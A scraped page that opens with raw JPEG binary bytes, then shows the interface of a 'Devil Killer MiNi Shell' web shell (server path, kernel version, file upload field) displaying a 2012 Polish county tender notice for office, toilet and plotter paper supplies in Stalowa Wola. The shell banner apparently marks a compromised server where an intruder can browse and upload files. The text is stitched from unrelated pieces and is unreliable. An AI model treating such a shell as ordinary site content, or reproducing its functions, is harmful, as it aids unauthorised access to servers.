JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120323/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120323/91364-N-2012.html

<p class="kh_header"><b>Stalowa Wola: Sukcesywna dostawa materiałów biurowych,  papierniczych i toaletowych do  Starostwa Powiatowego w Stalowej Woli
I  część	:  Sukcesywna dostawa materiałów biurowych i papierniczych
II  część	:  Sukcesywna dostawa materiałów toaletowych
III część	:  Sukcesywna dostawa  materiałów papierniczych do ploterów.</b><br>
<b>Numer ogłoszenia: 91364 - 2012; data zamieszczenia: 23.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Stalowowolski , ul. Podleśna 15, 37-450 Stalowa Wola, woj. podkarpackie, tel. 015 643 37 09, faks 015 643 36 02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.stalowowolski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa materiałów biurowych,  papierniczych i toaletowych do  Starostwa Powiatowego w Stalowej Woli
I  część	:  Sukcesywna dostawa materiałów biurowych i papierniczych
II  część	:  Sukcesywna dostawa materiałów toaletowych
III część	:  Sukcesywna dostawa  materiałów papierniczych do ploterów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  jest sukcesywna dostawa materiałów biurowych,  papierniczych i toaletowych do Starostwa Powiatowego w Stalowej Woli przy  ul. Podleśnej 15 , zgodnie z  zestawieniem  -  Załączniki A, B, C, 

I Część  - materiały papiernicze i  biurowe - Załącznik A
l.p.	Nazwa asortymentu	Jedn. miary	Ilość 

1	brudnopis A-4 blok z makulatury w kratkę, kartki wyrywane, 100 kart.	1 szt.	30
2	brudnopis A-5 blok z makulatury w kratkę, kartki wyrywane, 100 kart.	1 szt.	10
3	długopis przyklejany ze sprężynką stojący, na biurko	1 szt.	50
4	cienkopis , końcówka oprawiona w metal gr. 0,4 mm nie gorsz niż 
np. STAEDTLER	1 szt.	100
5	długopis zwykły 	1 szt.	100
6	długopis nie gorszy niż np. GelPen, różne kolory	1 szt.	250
7	dziurkacz biurowy ( dziurkuje  nie mniej niż 30 kartek )	1 szt.	10
8	dziurkacz biurowy ( dziurkuje  nie mniej niż 65 kartek ) 	1 szt.	5
9	datownik mały	1 szt.	5
10	druk- wniosek o urlop - wg zał. wzoru	1 bloczek	20
11	druk delegacji - wg. zał. wzoru	1 bloczek 	10
12	Dziennik Korespondencyjny A-4,  96 kart. - twarda okładka 	1 szt.	4
13	ekierka duża	1 szt.	5
14	flamastry 4 kolory	1 op.	5
15	flamaster różne kolory 	1 szt. 	50
16	folia do laminowania for. A5,  100 szt. ( 2 x 100 mic.)	1 opak.	5
17	folia do laminowania for. A4,  100 szt. ( 2 x 100 mic.)	1 opak.	5
18	gumka recepturka ( op. 0,5 kg)	1 opak.	2
19	gumka kreślarska do ścierania na  papierze średnia  nie gorsza niż gumka Pentel ZEH  	1 szt.	40
20	grzbiety wsuwane A4  zaokrąglone rogi  60 k  czarne	1 szt.	50
21	grzbiety wsuwane A4  zaokrąglone rogi  30 k  czarne 	1 szt.	30
22	grzbiety do bindowania śr. 22 mm	1 szt.	50
23	kalka do faxu Panasonic KX-FP 148	1 szt.	2
24	klip binder 25 mm ( opak. 12 szt.)	1 opak.	5
25	klip binder 32 mm ( opak 12 szt.)	1 opak.	2
26	klip binder  41 mm ( opak. 12 szt. )	1 opak.	2
27	klip binder 51 mm ( opak.12 szt.  )	1 opak.	2
28	karteczki samoprzylepne, 76x 76 mm 100 szt. w bloczku	1 bloczek	400
29	karteczki białe 400 szt. bez kleju, w bloczku	1 bloczek	2
30	koperty szare  aktowe format C4  229 x 324 z paskiem samoprzylepnym	1 szt.	2000
31	j. w. półaktowe - format C5 162 x 229 z paskiem samoprzylepnym, białe	1 szt.	10000
32	koperty białe samoprzylepne format - C6 114 x 162   - 1000 szt. w opakowaniu 	1 opak.	40
33	koperta biała,  format - B4 250 x 353 z paskiem samoprzylepnym	1 szt.	250
34	koperta B4 z rozszerzonym bokiem i spodem 250x353x38 mm 	1 szt.	250
35	koperta bąbelkowa o wym.    162 x 229 mm	1 szt.	10
36	koperta bąbelkowa  na płyty CD kwadratowa 	1 szt.	100
37	koperta DL SK 110x 220 mm	1 szt.	2000
38	koszulki na akta  form.A4,  (100 szt. w opak.)   nie gorsze niż  Esselte wykonane z grubszej folii , nie mniej niż  55 mic 	1 opak.	110
39	kalka techniczna A3, gramatura 90.95 g.m2	1 szt.	100
40	klej do papieru, fotografii, mocno klejący nie marszczący papieru, nie gorszy niż np. PRITT, sztyft -20 g	1 szt.	110
41	klej biurowy  21 g	1 szt.	100
42	korektor - metalowa końcówka  nie gorszy niż np.Pentel	1 szt.	60
43	korektor w taśmie- szer. 4,2 mm dł. 6 m nie gorszy niż np. DELI	1 szt.	30
44	kredki ołówkowe 12 kolorów 	1 opak.	1
45	marker  czarny niezmywalny, wodoodporny z końcówką okrągłą gr. linii pisania 2-4 mm nie gorszy niż  np.BIC	1 szt.	50
46	marker z tłoczkiem,  różne kolory	1 szt.	10
47	magnesy do tablicy (opakowanie 12 szt. ) 	1 opak.	3
48	nożyk introligatorski nie gorszy niż Bantex	1 szt. 	5
49	nożyczki z ostrzem z nierdzewnej stali, rękojeść z niełamliwego plastiku, wys. 21 cm nie gorsze niż np. DONAU	1 szt.	20
50	linijka plastikowa dł. 30 cm przezroczysta	1 szt.	10
51	okładka do bindowania A4 - przód- bezbarwna, przezroczysta  	1 szt.	200
52	okładka do bindowania A4 - tył- niebieski, skóropodobna	1 szt.	200
53	ołówek drewniany bez gumki HB nie gorsze niż  STAEDTLER	1 szt.	100
54	ołówek automatyczny na rysiki gr. 0,7mm 	1 szt.	30
55	ofertówki sztywne A4 przeźroczyste (25 szt.)	1 opak.	10
56	okładka na dyplom A4 - różne kolory	1 szt	10
57	papier ozdobny o gramaturze 160g.m2 ( opakowanie 25 szt.)  nie gorszy niż Marble Cover   	1 opak.	5
58	papier do wszelkich urządzeń biurowych,500 szt. w ryzie, gramatura co najm. 80g.m2, format A4, białość co najm. C 146	1 ryza	1400
59	j.w lecz format A-3	1 ryza	100
60	papier do wszelkich urządzeń biurowych,500 szt. w ryzie, gramatura co najm. 80g.m2, format A4,  kolor	1 ryza	2
61	papier ozdobny nie gorszy  niż Galeria ( 50a) , gramatura 100g.m2, format A4 ( opakowanie 50 szt.)	1 opak.	5
62	papier ozdobny nie gorszy  niż Galeria ( 25a) , gramatura 250g.m2, format A4 ( opakowanie 25 szt.)	1 opak.	5
63	papier  do faxu  216 mm x 30m nie gorszy niż EMERSON	1 rolka	40
64	papier - barwne arkusze  - A4  gram. 100g.m2 ( op. 50 szt.) nie gorszy niż np. Italia L	1 opak	5
65	papier- barwne arkusze - A4  gram. 170g.m2 ( op. 25 szt.) nie gorszy niż np. Arnika	1 opak	5
66	papier komputerowy  ( 1 oryg.+2 kopie z napisem oryginał kopia) - szer. 240 wys. 305mm nie gorszy niż EMERSON	1 szt.	10
67	papier wizytówkowy  biały A4 o gram co najmniej 230g.m2	1 op.	10
68	papier biurowy, 250 szt. w opakowaniu, gramatura co najm. 230g.m2, format A4,  biały, gładki  	1 ryza	5
69	papier biurowy, 250 szt. w opakowaniu gramatura co najm. 200gr.m2, format A3, biały	1 ryza	1
70	kołeczki plastikowe kolorowe do tablic korkowych ( op. 50 szt. ) 	1 opak.2
71	płyta CD-R  Slim	1 szt.	200
72	płyta DVD-R Slim	1 szt.	50
73	płyta CD-R z możliwością nadruku	1 szt.	50
74	płyta DVD-R z możliwością nadruku	1 szt. 50
75	płyta DVD+RW Slim	1 szt.	50
76	poduszka do tuszu czerwona o wym. około 50 x90 mm nie gorsze niż np. Trodat	1 szt.	10
77	poduszka do tuszu czerwona o wym. około 160x90mm nie gorsze niż np. Trodat	1 szt.	5
78	pojemnik na spinacze z magnesem z wytrzymałego tworzywa sztucznego o poj. do 30 szt. nie gorszy niz . EAGLE	1 szt.	2
79	półka  plastikowa na dokumenty , przeźroczysta   	1 szt.	30
80	pianka ( płyn) do czyszczenia obudowy sprzętu komputerowego o poj. 400 ml	1 szt.	5
81	płyn do  czyszczenia ekranów monitorów LCD poj. 100 ml	1 szt.	5
82	pudła archiwizacyjne A4 z tektury bezkwasowej do przechowywania dokumentów w pozycji pionowej szer. 50 mm, gramatura nie mniej niż 1000g.m2 	1 szt.	150
83	pudła archiwizacyjne A4 z tektury bezkwasowej do przechowywania dokumentów w pozycji pionowej szer. 100 mm gramatura nie mniej niż 1000g.m2 	1 szt.	150
84	rozszywacz do zszywek 24.6 metalowy, w obudowie plastikowej 	1 szt.	12
85	rysiki do ołówków automatycznych B  gr. 0,7 	1 opak.	10
86	rysiki do ołówków automatycznych B  gr. 0,5 	1 opak.	10
87	segregator A4, gr. 7 cm,  na dolnych krawędziach metalowe okucia, zew. okładka z PP, wyklejony wew. jasnym papierem, okładka zew. kolorowa, wymienialna etykietka na grzbiecie	1 szt.	500
88	j.w. segregator  A4  gr. 5 cm	1 szt.	100
89	skoroszyt karton  pełny, 250g.m2,  A4	1 szt.	50
90	skoroszyt karton oczkowy pełny  250g.m2,  A4	1 szt.	600
91	skoroszyt karton ? oczkowy 250g.m2 A4	1 szt.	100
92	skoroszyt plastikowy, oczkowy  A4  z twardego  i sztywnego PCV, tył kolorowy	1 szt.	600
93	spinacze biurowe małe,  28 mm - opak. 100 szt.	1 opak.	150
94	spinacze biurowe duże , 50 mm - opak. 100 szt. 	1 opak.	80
95	strugaczka do ołówków obudowa z tworzywa sztucznego poj. ostrze, obudowa okrągła 	1 szt.	20
96	sznurek szpagat jutowy 50 dkg	1 szt.	40
97	tusz do pieczątek - czerwony 25 ml nie gorsz niż  np. Shiny	1 szt.	25
98	j.w. lecz  czarny 25 ml nie gorsz niż np. Shiny	1 szt.	10
99	taśma klejąca bezbarwna 18 mm x20 m 	1 szt.	80
100	taśma pakowa 48 mm x50 akrylowa brązowa 	1 szt.	10
101	taśma matowa na podajniku nie gorsza niż Scotch	1 szt.	5
102	taśma do maszyny do pisania czarna 13 mm	1 szt.	2
103	teczka wiązana A4, karton 250g.m2	1 szt.	3000
104	teczka wiązana A4, plastikowa (PCV)	1 szt.	50
105	teczka skrzydłowa na rzepy	1 szt.	5
106	teczka harmonijkowa  do podpisu 20 kart.	1 szt.	10
107	wkład do zwykłego długopisu dł. 14 cm , gruba końcówka	1 szt.	50
108	wkład wymienny  do Rapidografu gr. 0,25 nie gorszy niż Rystor 	1 szt.	2
109	wkład do długopisu wykazanego w poz. 6, różne kolory	1 szt.	300
110	zakładki indeksujące standardowe o wym. 20 x50 mm  	1 op.	5
111	zszywki  24.6 - opak. 1000 szt.   - do 20 kart.	1 opak.	170
112	zszywki do ciężkiego zszywacza, 23.8 -opak 1000 szt.- do 100 kartek	1 opak.	10
113	zeszyt A5  kratka  32 kartkowy	1 szt.	5
114	zeszyt A4  kratka  96 kartkowy , twarda okładka 	1 szt.	30
115	zeszyt A5  kratka  96 kartkowy, twarda okładka 	1 szt.	20
116	zeszyt A5  kratka  16 kartkowy	1 szt.	5
117	zszywacz biurowy ( zszywa  min 50 kartek ) o dł. ramienia około 12 cm nie gorszy niż  SAX	1 szt.	15
118	zszywacz biurowy ( zszywa   200  kartek ) 	1 szt.	2
119	zakreślacz fluorescencyjny, z wyprofilowaną  ściętą końcówka gr. 2-5 mm 	1 szt.	100

II Część  -  materiały toaletowe   -    Załącznik  B
L.p.	Nazwa asortymentu	Jedn. miary	Ilość 

1	papier toaletowy biały, dwuwarstwowy o średnicy  18 cm wysokości 9cm długości około 130 mb do podajników zamykanych typu TORK, EKA 
( wypełniający cały pojemnik)	1 rolka	1200
2	papier toaletowy zwykły do zawieszania, długości min  30 mb  1 rolka	800
3	ręczniki papierowe białe, dwuwarstwowe o średnicy  14cm, wysokości 19cm  długości około 65 mb MINI do podajników zamykanych typu TORK, EKA ( wypełniający cały pojemnik )	1 rolka	 1000
4	ręczniki papierowe białe, dwuwarstwowe o średnicy 18cm, wysokości 19cm  długości około 130 mb JAMBO do podajników zamykanych TORK, EKA ( wypełniający cały pojemnik) 	1 szt.	600
5	ręcznik kuchenny  ( 2 szt. w zgrzewce )	1 zgrzewka	60
6	płyn do mycia naczyń 5 l nie gorszy niż Ludwik 	1pojemnik	10
7	mydło w płynie antybakteryjne opak 5 l	1pojemnik	25
8	mydło toaletowe w kostce 100g	1 szt.	40
9	kostka zapachowa WC nie gorsza niż np. Domestos	1 szt.	30
10	płyn do czyszczenia nie gorszy niż AJAX opak 1 litr	1 szt.	3

III Część  -  materiały papiernicze  do  ploterów  -  Załącznik C

L.p.	Nazwa asortymentu	Jedn. miary	Ilość 

1	papier do plotera Ricoh-PPC, wysoka biel, bezpyłowy 80grs.m2 0,914 x 175 m	1 opak.	12
2	papier do plotera Ricoh-PPC,  wysoka biel, bezpyłowy 80grs.m2 0,841 x 175 m	1 opak.	12
3	papier do plotera Ricoh-PPC , wysoka biel, bezpyłowy 80grs.m2 0,594 x 175 m	1 opak.	12
4	papier do plotera Ricoh-PPC , wysoka biel, bezpyłowy 80grs.m2 0,420 x 175 m	1 opak.	12
5	papier do plotera Ricoh-PPC , wysoka biel, bezpyłowy 80grs.m2 0,297 x 175 m	1 opak.	12
6	papier do plotera OCE AO, wysoka biel, bezpyłowy 90grs.m2 0,841 x 120 m Nr art.97024719	1 opak.	12
7	papier do plotera OCE AO wysoka biel, bezpyłowy 90grs.m2 0,594 x 120 m Nr art. 97024717	1 opak.	12
8	papier do plotera HP-DIAJET, wysoka biel, bezpyłowy 90grs.m2 0,610 x 50 m	1 opak.	6
9	papier do plotera HP-DIAJET, wysoka biel, bezpyłowy 90grs.m2 0,420 x 50 m	1 opak.	6
10	papier do plotera HP-DIAJET, wysoka biel, bezpyłowy 90grs.m2 0,297 x 50 m	1opak.	6

1.Dostarczany przedmiot zamówienia musi być nowy, fabrycznie opakowany, wolny od wad technicznych, jakościowo dobry oraz spełniać wymagania obowiązujących  norm i  przepisów. 

2.Przedstawione w wykazach ilości zamówienia są wielkościami, które w trakcie trwania umowy mogą ulec zmianie. Wykazane ilości mają charakter orientacyjny przyjęty dla celu porównania ofert i wyboru najkorzystniejszej oferty. Zamawiający nie gwarantuje ich całkowitej realizacji. Wykonawcy z którym Zamawiający podpisze umowę nie przysługuje roszczenie o realizację dostawy w wielkościach podanych w Załącznikach A,B,C,

3.Zamawiający w kolejnych składanych zamówieniach będzie szczegółowo określał ilości zamawianego asortymentu. Realizacja przedmiotu zamówienia będzie następować każdorazowo na podstawie złożonego faxem zamówienia określającego ilość i asortyment dostawy zgodnie z w.w zestawieniem. 

4.Zamówiona faxem dostawa musi być zrealizowana w ciągu 2 dni roboczych ( za dni robocze uznaje się dni od poniedziałku do piątku ) od momentu zgłoszenia zamówienia przez Zamawiającego, a w przypadkach wymagających natychmiastowej dostawy w ciągu 24 godz. od momentu zgłoszenia. Jeżeli termin realizacji dostawy przypada na dzień wolny od pracy dla Zamawiającego, termin ten upływa w następnym dniu roboczym Zamawiającego.   

5.Zamawiający  dopuszcza składanie ofert równoważnych.  

W przypadku gdy Zamawiający dokonał opisu przedmiotu zamówienia w Załącznikach  A,B,C, przez wskazanie przykładowych nazw, znaków towarowych lub pochodzenia, dopuszcza się zastosowanie rozwiązań równoważnych opisywanym. Wszystkie wskazane z nazwy materiały należy rozumieć jako określenie wymaganych parametrów technicznych lub standardów jakościowych. 

Oferowane przez Wykonawcę materiały równoważne muszą być w ofercie wymienione z nazwy. Ciężar udowodnienia, że materiały równoważne posiadają parametry wymagane przez Zamawiającego leży po  stronie Wykonawcy.

Przez materiały równoważne Zamawiający rozumie produkt o parametrach takich samych bądź lepszych w stosunku do oryginału produkowanego przez producenta materiału. 
	
6.Jeżeli ze względów technicznych i jakościowych materiał równoważy nie będzie mógł być wykorzystywany przez Zamawiającego, Wykonawca zobowiązany jest dostarczyć nowy oryginalny materiał po cenie równoważnego. Wymiana produktu nastąpi w ciągu 24 godz. od momentu zgłoszenia przez Zamawiającego o wadliwym produkcie. 

7.Wykonawca zobowiązany jest dostarczyć przedmiot zamówienia własnym środkiem transportu do Starostwa Powiatowego w Stalowej Woli przy ul.  Podleśnej 15.

8.Na dostarczone materiały biurowe, papiernicze, toaletowe, Wykonawca udziela 12 miesięcznej gwarancji  liczonej od dnia dostawy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających stanowiących nie więcej niż 10% wartości zamówienia podstawowego polegających na rozszerzeniu dostawy.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-4, 30.19.76.44-4, 33.76.10.00-2, 33.76.30.00-6, 33.71.19.00-6, 39.83.20.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty- Załącznik nr 1 wraz ze Specyfikacjami cenowymi - Załącznik A,B,C, dotyczącymi poszczególnych części przedmiotu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.stalowowolski.bip.podkarpackie.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Stalowej Woli , 37-450 Stalowa Wola ul. Podleśna 15, pokój nr 311.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.04.2012 godzina 11:00, miejsce: Starostwa Powiatowe w Stalowej Woli, 37-450 Stalowa Wola ul. Podleśna 15 
pokój nr 311.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
